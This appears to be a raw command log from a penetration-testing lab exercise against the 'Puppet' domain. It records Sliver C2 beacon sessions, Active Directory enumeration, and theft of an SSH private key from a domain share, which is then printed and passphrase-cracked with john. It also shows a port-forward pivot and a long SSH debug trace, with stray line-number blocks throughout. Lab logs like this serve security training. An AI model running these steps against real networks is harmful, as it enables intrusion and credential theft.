b6c9c08a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 23s 47s
32980854 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 11s 1m12s
6b4df07e BLUSHING_ERROR mtls File01 <err> windows/amd64 8s 8s
sliver (BLUSHING_ERROR) > beacons watch
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ==================== ================== =============== ===============
c2bc9d9f BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 12s 59s
7f369ddc BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 47s 35s
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ==================== ================== =============== ===============
c2bc9d9f BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 14s 57s
7f369ddc BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 49s
sliver (BLUSHING_ERROR) > use 1e1cf5b6
[*] Active session BLUSHING_ERROR (1e1cf5b6-04b1-42d3-bda7-3fdce60713e0)
[*] Output:
file01\admin1
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ==================== ================== =============== ===============
c2bc9d9f BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m27s 16s
7f369ddc BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 59s 25s
f9359c28 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 48s 20s
b6c9c08a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 17s 1m0s
32980854 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 13s 57s
6b4df07e BLUSHING_ERROR mtls File01 <err> windows/amd64 11s 1m8s
sliver (BLUSHING_ERROR) >
sliver (BLUSHING_ERROR) > getprivs
Privilege Information for puppet-update.exe (PID: 3156)
-------------------------------------------------------
Process Integrity Level: Medium
Name Description Attributes
==== =========== ==========
SeChangeNotifyPrivilege Bypass traverse checking Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
sliver (BLUSHING_ERROR) > execute -o -- whoami /all
[*] Output:
User Name SID
============= =============================================
file01\admin1 S-1-5-21-2946821189-2073930159-359736154-1006
Group Name Type SID Attributes
============================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Kerberos support for Dynamic Access Control on this device has been disabled.
```jsx
…/prolab/Puppet ❯ cat \\\\dc01.puppet.vl\\it\\.ssh\\ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCxU1nCO+
dxhZAm1G/jjp8uAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIDS4W6uOArXO9Sk
20zh7L7wAhVJXtBJlE81UZTrWNTvAAAAoAm6ALXYxUJivwEDEI5cL8eFm4UGvFjhMAYqXn
pmETEzfyoxkL7fiuwF6CVpSH/4lwaeavmsI4aQB8qP4pF3G2RhDwQ6fshuYNnSM5e+S9iX
W4QeIL3Z2pc8vL0SlOmm53EBi/QEKJxLv7uc3L9RfSjjE0gSz6aE40XJpMTueru2aQ4lXR
aFFgi5jnR/2k47UA/O8iU/Oqgr55msmRxU1QU=
-----END OPENSSH PRIVATE KEY-----
…/prolab/Puppet ❯ mv \\\\dc01.puppet.vl\\it\\.ssh\\ed25519 ssh.key
…/prolab/Puppet ❯ ssh2john ssh.key > key.hash
…/prolab/Puppet ❯ cat key.hash
ssh.key:$sshng$6$16$b15359c23be771859026d46fe38e9f2e$290$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010b15359c23be771859026d46fe38e9f2e0000001000000001000000330000000b7373682d656432353531390000002080d2e16eae380ad73bd4a4db4ce1ecbef00215495ed049944f355194eb58d4ef000000a009ba00b5d8c54262bf0103108e5c2fc7859b8506bc58e130062a5e7a661131337f2a3190bedf8aec05e82569487ff897069e6af9ac23869007ca8fe291771b64610f043a7ec86e60d9d23397be4bd8975b841e20bdd9da973cbcbd1294e9a6e771018bf404289c4bbfbb9cdcbf517d28e3134812cfa684e345c9a4c4ee7abbb6690e255d16851608b98e747fda4e3b500fcef2253f3aa82be799ac991c54d505$16$130
…/prolab/Puppet ❯ john ssh.key --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
…/prolab/Puppet ❯ john key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
puppet (ssh.key)
1g 0:00:06:21 DONE (2026-09-30 02:26) 0.002618g/s 21.53p/s 21.53c/s 21.53C/s total90..flopsy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
…/prolab/Puppet ❯ nano johncreak
…/prolab/Puppet ❯ john --show key.hash
ssh.key:puppet
1 password hash cracked, 0 left
…/prolab/Puppet ❯ nmap -sV -Pn 172.16.40.5
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-30 02:33 -0400
…/prolab/Puppet ✗ nmap -Pn -sV 172.16.40.5
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-30 02:34 -0400
Nmap scan report for 172.16.40.5
Host is up.
All 1000 scanned ports on 172.16.40.5 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.99 seconds
…/prolab/Puppet ❯ ssh -i ssh.key -p 2222 "svc_puppet_lin_t1@puppet.vl"@127.0.0.1
^C
…/prolab/Puppet ✗ nmap -Pn -p 2222 127.0.0.1
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-30 02:42 -0400
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000065s latency).
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
…/prolab/Puppet ❯ nmap -Pn -p- 127.0.0.1
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-30 02:42 -0400
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000050s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
…/prolab/Puppet ❯ ssh -i ssh.key -p 2222 "svc_puppet_lin_t1@puppet.vl"@127.0.0.1
kex_exchange_identification: read: Connection reset by peer
Connection reset by 127.0.0.1 port 2222
…/prolab/Puppet ✗ ssh -i ssh.key -p 2222 "svc_puppet_win_t1@puppet.vl"@127.0.0.1
kex_exchange_identification: read: Connection reset by peer
Connection reset by 127.0.0.1 port 2222
…/prolab/Puppet ✗
sliver (BLUSHING_ERROR) > execute -o – powershell.exe -NoProfile -Command “$ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if($ok -and $c.Connected){Write-Output "$p OPEN"}; $c.Dispose()}”
⠋ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠙ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠹ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠸ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠼ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠴ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠦ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠧ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if( ⠇ Executing powershell.exe -NoProfile -Command $ports=53,88,135,139,389,445,464,636,3268,3269,3389,5985,5986,9389; foreach($p in $ports){$c=[Net.Sockets.TcpClient]::new(); $ok=$c.ConnectAsync(‘172.16.40.5’,$p).Wait(500); if([*] Output: 53 OPEN 88 OPEN 135 OPEN 139 OPEN 389 OPEN 445 OPEN 464 OPEN 636 OPEN 3268 OPEN 3269 OPEN 3389 OPEN 5985 OPEN 9389 OPEN
sliver (BLUSHING_ERROR) > execute -o – cmd.exe /c “net view \dc01.puppet.vl”
[] Output: [] Stderr: System error 1702 has occurred.
The binding handle is invalid.
[!] Exited with status 2!
sliver (BLUSHING_ERROR) > execute -o – nltest /dsgetdc:puppet.vl
[*] Output: DC: \DC01.puppet.vl Address: \172.16.40.5 Dom Guid: 717c729c-4900-4973-917d-55337baaa52b Dom Name: puppet.vl Forest Name: puppet.vl Dc Site Name: Default-First-Site-Name Our Site Name: Default-First-Site-Name Flags: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9 DS_10 KEYLIST The command completed successfully
sliver (BLUSHING_ERROR) > execute -o – cmd.exe /c “net group /domain”
Group Accounts for \DC01.puppet.vl
*admins_t0 *admins_t1 *Cloneable Domain Controllers *DnsUpdateProxy *Domain Admins *Domain Computers *Domain Controllers *Domain Guests *Domain Users *employees *Enterprise Admins *Enterprise Key Admins *Enterprise Read-only Domain Controllers *Group Policy Creator Owners *Key Admins *Protected Users *Read-only Domain Controllers *Schema Admins The command completed successfully.
sliver (BLUSHING_ERROR) > net user /domain error: unknown command, try ‘help’ sliver (BLUSHING_ERROR) > execute -o – cmd.exe /c “net user /domain”
Administrator Alan.Carr Beth.Fletcher
Brenda.Nicholls Bruce.Smith Callum.Barber
Chloe.Powell Damien.Brown Elaine.Wilson
Francis.Payne George.Smith Guest
Hannah.Begum Joanne.Morris Judith.Burton
June.Lewis Kelly.Rowe krbtgt
Leigh.Coates Leigh.Hamilton Leonard.Woods
Paige.Jones Pamela.Oliver Phillip.Rowe
Richard.Buckley root Simon.Parkes
Stanley.White svc_puppet_lin_t1 svc_puppet_win_t0
svc_puppet_win_t1 Tracy.Roberts
The command completed successfully.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
…/prolab/Puppet ❯ mv '\\dc01.puppet.vl\it\.ssh\ed25519' ed25519
…/prolab/Puppet ❯ sudo chmod 600 ed25519
[sudo] password for neo:
…/prolab/Puppet ❯ ssh -i ed25519 -p 2222 "svc_puppet_lin_t1@puppet.vl"@127.0.0.1
The authenticity of host '[127.0.0.1]:2222 ([127.0.0.1]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:i9tMA6FNxAdTs8Lzmp6yEKKJG6Hndq4/JLGf05lOBMs
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[127.0.0.1]:2222' (ED25519) to the list of known hosts.
Connection closed by 127.0.0.1 port 2222
…/prolab/Puppet ✗ ssh -i ed25519 -p 2222 "svc_puppet_lin_t1@puppet.vl"@127.0.0.1
Load key "ed25519": error in libcrypto: unsupported
svc_puppet_lin_t1@puppet.vl@127.0.0.1's password:
Permission denied, please try again.
svc_puppet_lin_t1@puppet.vl@127.0.0.1's password:
Permission denied, please try again.
svc_puppet_lin_t1@puppet.vl@127.0.0.1's password:
svc_puppet_lin_t1@puppet.vl@127.0.0.1: Permission denied (publickey,password).
…/prolab/Puppet ✗ cat ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCxU1nCO+
dxhZAm1G/jjp8uAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIDS4W6uOArXO9Sk
20zh7L7wAhVJXtBJlE81UZTrWNTvAAAAoAm6ALXYxUJivwEDEI5cL8eFm4UGvFjhMAYqXn
pmETEzfyoxkL7fiuwF6CVpSH/4lwaeavmsI4aQB8qP4pF3G2RhDwQ6fshuYNnSM5e+S9iX
W4QeIL3Z2pc8vL0SlOmm53EBi/QEKJxLv7uc3L9RfSjjE0gSz6aE40XJpMTueru2aQ4lXR
aFFgi5jnR/2k47UA/O8iU/Oqgr55msmRxU1QU=
-----END OPENSSH PRIVATE KEY-----
…/prolab/Puppet ❯ sed -i 's/\r$//' ed25519 && chmod 600 ed25519 && ssh-keygen -y -f ed25519 >/tmp/ed25519.pub
Enter passphrase for "ed25519":
…/prolab/Puppet ❯ ls
20260929003322_puppet-bh command2 ntuser.dat sliver-client_linux
20260929003322_puppet-bh.zip command-sli PrivescCheck.ps1 ssh.key
31337-openssl CVE-2021-1675.ps1 puppet_ed25519 ssh_lf.key
admin ed25519 red_127.0.0.1.cfg 'upload e c temp SspiUacBypass.txt'
admin-1 hashfromadminadmin rustscan-port winpeas.txt
admin-admin johncreak SharpHound.exe
command1 key.hash sharpsh
…/prolab/Puppet ❯ cat puppet_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCxU1nCO+
dxhZAm1G/jjp8uAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIDS4W6uOArXO9Sk
20zh7L7wAhVJXtBJlE81UZTrWNTvAAAAoAm6ALXYxUJivwEDEI5cL8eFm4UGvFjhMAYqXn
pmETEzfyoxkL7fiuwF6CVpSH/4lwaeavmsI4aQB8qP4pF3G2RhDwQ6fshuYNnSM5e+S9iX
W4QeIL3Z2pc8vL0SlOmm53EBi/QEKJxLv7uc3L9RfSjjE0gSz6aE40XJpMTueru2aQ4lXR
aFFgi5jnR/2k47UA/O8iU/Oqgr55msmRxU1QU=
-----END OPENSSH PRIVATE KEY-----
…/prolab/Puppet ❯ cat /tmp/ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIDS4W6uOArXO9Sk20zh7L7wAhVJXtBJlE81UZTrWNTv xct@offensive-ops
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
sliver (BLUSHING_ERROR) > execute -o -- arp -a
Interface: 172.16.40.50 --- 0x3
Internet Address Physical Address Type
172.16.40.5 a2-de-ad-8f-19-ce dynamic
172.16.40.200 a2-de-ad-ee-33-93 dynamic
172.16.40.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
sliver (BLUSHING_ERROR) > sa-netshares dc01
[!] Call extension error: rpc error: code = Unknown desc = The parameter is incorrect.
sliver (BLUSHING_ERROR) > download \\\\dc01.puppet.vl\\it\\.ssh\\ed25519
[*] Wrote 472 bytes (1 file successfully, 0 files unsuccessfully) to /home/neo/pro/htb/prolab/Puppet/\\dc01.puppet.vl\it\.ssh\ed25519
sliver (BLUSHING_ERROR) > portfwd add --bind 2222 -r 172.16.40.200:22
[*] Port forwarding 127.0.0.1:2222 -> 172.16.40.200:22
```jsx
…/prolab/Puppet ✗ ssh -vvv \
-o PreferredAuthentications=publickey \
-o PasswordAuthentication=no \
-o IdentitiesOnly=yes \
-i ./ed25519 \
-p 2222 \
-l 'svc_puppet_lin_t1@puppet.vl' \
127.0.0.1
debug1: OpenSSH_10.3p1 Debian-4, OpenSSL 3.6.3 9 Jun 2026
debug3: Running on Linux 6.19.14+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.19.14-1+kali1 (2026-05-05) x86_64
debug3: Started with: ssh -vvv -o PreferredAuthentications=publickey -o PasswordAuthentication=no -o IdentitiesOnly=yes -i ./ed25519 -p 2222 -l svc_puppet_lin_t1@puppet.vl 127.0.0.1
debug1: Reading configuration data /etc/ssh/ssh_config
debug3: /etc/ssh/ssh_config line 19: Including file /etc/ssh/ssh_config.d/20-systemd-ssh-proxy.conf depth 0
debug1: Reading configuration data /etc/ssh/ssh_config.d/20-systemd-ssh-proxy.conf
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug2: resolve_canonicalize: hostname 127.0.0.1 is address
debug3: expanded UserKnownHostsFile '~/.ssh/known_hosts' -> '/home/neo/.ssh/known_hosts'
debug3: expanded UserKnownHostsFile '~/.ssh/known_hosts2' -> '/home/neo/.ssh/known_hosts2'
debug3: channel_clear_timeouts: clearing
debug3: ssh_connect_direct: entering
debug1: Connecting to 127.0.0.1 [127.0.0.1] port 2222.
debug3: set_sock_tos: set socket 3 IP_TOS 0xb8
debug1: Connection established.
debug1: loaded pubkey from ./ed25519: ED25519 SHA256:MRGg+7Yuv9V3iIge9zYv+Z2Vf/pn4UIe4QnJNvEFSGw
debug1: identity file ./ed25519 type 2
debug1: no identity pubkey loaded from ./ed25519
debug1: Local version string SSH-2.0-OpenSSH_10.3p1 Debian-4
debug1: Remote protocol version 2.0, remote software version OpenSSH_8.9p1 Ubuntu-3ubuntu0.11
debug1: compat_banner: match: OpenSSH_8.9p1 Ubuntu-3ubuntu0.11 pat OpenSSH* compat 0x04000000
debug2: fd 3 setting O_NONBLOCK
debug1: Authenticating to 127.0.0.1:2222 as 'svc_puppet_lin_t1@puppet.vl'
debug3: put_host_port: [127.0.0.1]:2222
debug3: record_hostkey: found key type ED25519 in file /home/neo/.ssh/known_hosts:2
debug3: load_hostkeys_file: loaded 1 keys from [127.0.0.1]:2222
debug1: load_hostkeys: fopen /home/neo/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug3: order_hostkeyalgs: have matching best-preference key type ssh-ed25519-cert-v01@openssh.com, using HostkeyAlgorithms verbatim
debug3: send packet: type 20
debug1: SSH2_MSG_KEXINIT sent
debug3: receive packet: type 20
debug1: SSH2_MSG_KEXINIT received
debug2: local client KEXINIT proposal
debug2: KEX algorithms: mlkem768x25519-sha256,sntrup761x25519-sha512,sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com
debug2: host key algorithms: ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,webauthn-sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,webauthn-sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256
debug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
debug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
debug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: compression ctos: none,zlib@openssh.com
debug2: compression stoc: none,zlib@openssh.com
debug2: languages ctos:
debug2: languages stoc:
debug2: first_kex_follows 0
debug2: reserved 0
debug2: peer server KEXINIT proposal
debug2: KEX algorithms: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,sntrup761x25519-sha512@openssh.com,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,kex-strict-s-v00@openssh.com
debug2: host key algorithms: rsa-sha2-512,rsa-sha2-256,ecdsa-sha2-nistp256,ssh-ed25519
debug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
debug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
debug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: compression ctos: none,zlib@openssh.com
debug2: compression stoc: none,zlib@openssh.com
debug2: languages ctos:
debug2: languages stoc:
debug2: first_kex_follows 0
debug2: reserved 0
debug3: kex_choose_conf: will use strict KEX ordering
debug1: kex: algorithm: sntrup761x25519-sha512@openssh.com
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug3: send packet: type 30
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug3: receive packet: type 31
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:i9tMA6FNxAdTs8Lzmp6yEKKJG6Hndq4/JLGf05lOBMs
debug3: put_host_port: [127.0.0.1]:2222
debug3: put_host_port: [127.0.0.1]:2222
debug3: record_hostkey: found key type ED25519 in file /home/neo/.ssh/known_hosts:2
debug3: load_hostkeys_file: loaded 1 keys from [127.0.0.1]:2222
debug1: load_hostkeys: fopen /home/neo/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: Host '[127.0.0.1]:2222' is known and matches the ED25519 host key.
debug1: Found key in /home/neo/.ssh/known_hosts:2
debug3: send packet: type 21
debug1: ssh_packet_send2_wrapped: resetting send seqnr 3
debug2: ssh_set_newkeys: mode 1
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug3: receive packet: type 21
debug1: ssh_packet_read_poll2: resetting read seqnr 3
debug1: SSH2_MSG_NEWKEYS received
debug2: ssh_set_newkeys: mode 0
debug1: rekey in after 134217728 blocks
debug2: KEX algorithms: mlkem768x25519-sha256,sntrup761x25519-sha512,sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com
debug2: host key algorithms: ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,webauthn-sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,webauthn-sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256
debug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
debug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
debug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: compression ctos: none,zlib@openssh.com
debug2: compression stoc: none,zlib@openssh.com
debug2: languages ctos:
debug2: languages stoc:
debug2: first_kex_follows 0
debug2: reserved 0
debug3: send packet: type 5
debug3: receive packet: type 7
debug1: SSH2_MSG_EXT_INFO received
